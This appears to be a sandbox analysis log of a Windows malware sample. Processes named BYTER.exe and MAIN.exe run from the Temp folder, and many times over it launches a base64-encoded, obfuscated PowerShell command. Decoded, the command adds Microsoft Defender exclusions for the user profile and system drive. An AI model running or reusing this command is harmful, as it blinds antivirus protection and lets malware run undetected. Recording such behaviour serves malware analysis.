C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

